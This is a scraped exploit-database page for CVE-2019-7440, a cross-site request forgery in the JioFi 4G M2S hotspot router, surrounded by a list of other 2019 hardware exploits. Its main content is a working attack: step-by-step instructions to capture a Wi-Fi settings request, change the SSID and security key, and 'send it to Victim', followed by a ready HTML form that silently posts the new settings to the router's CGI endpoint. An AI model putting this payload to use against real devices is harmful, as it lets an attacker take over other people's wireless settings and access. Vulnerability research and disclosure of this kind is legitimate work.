Menu

Improved exploit search engine. Try it out

"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery"

Author

"Vikas Chaudhary"

Platform

hardware

Release date

2019-04-02

Release Date Title Type Platform Author
2019-04-17 "ASUS HG100 - Denial of Service" dos hardware "YinT Wang"
2019-04-16 "Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting" webapps hardware "Aaron Bishop"
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-10 "D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting" webapps hardware "Semen Alexandrovich Lyhin"
2019-04-09 "TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow" remote hardware "Grzegorz Wypych"
2019-04-08 "SaLICru -SLC-20-cube3(5) - HTML Injection" webapps hardware Ramikan
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-04-02 "JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery" webapps hardware "Vikas Chaudhary"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery" webapps hardware "Kumar Saurav"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control" webapps hardware "Kumar Saurav"
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
Release Date Title Type Platform Author
2019-04-02 "JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery" webapps hardware "Vikas Chaudhary"
2019-04-02 "WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering" webapps php "Vikas Chaudhary"
2018-08-15 "JioFi 4G M2S 1.0.2 - Denial of Service (PoC)" dos hardware "Vikas Chaudhary"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46633/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46633/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46633/41080/jiofi-4g-m2s-102-cross-site-request-forgery/download/", "exploit_id": "46633", "exploit_description": "\"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery\"", "exploit_date": "2019-04-02", "exploit_author": "\"Vikas Chaudhary\"", "exploit_type": "webapps", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi&#95;Setting request to cgi-bin/qcmap_web_cgi)
# Exploit Author:  Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link:  https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web:  https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7440
***********************************************************************
## Vulnerability Description :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. 
 The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.
----------------------------------------
# Proof Of Concept:-PoC
1- First Open BurpSuite
2- Make Intercept on 
3 -Go to your Wifi Router's  Gateway in Browser  [i.e http://192.168.225.1 ]
4-Goto wifi edit section and click on apply 
5-Now capture the data and generate CSRF PoC
6-Now Change the SSID name and Password (Security Key) According to you 
7-Save it as .html and send it to Victim.
8-Victim's profile will be changed according to you
-------------------

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.225.1/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="&#32;Myaim&#95;Vikas" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="12345678" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="8" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="052d80c2c7aa1c90" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>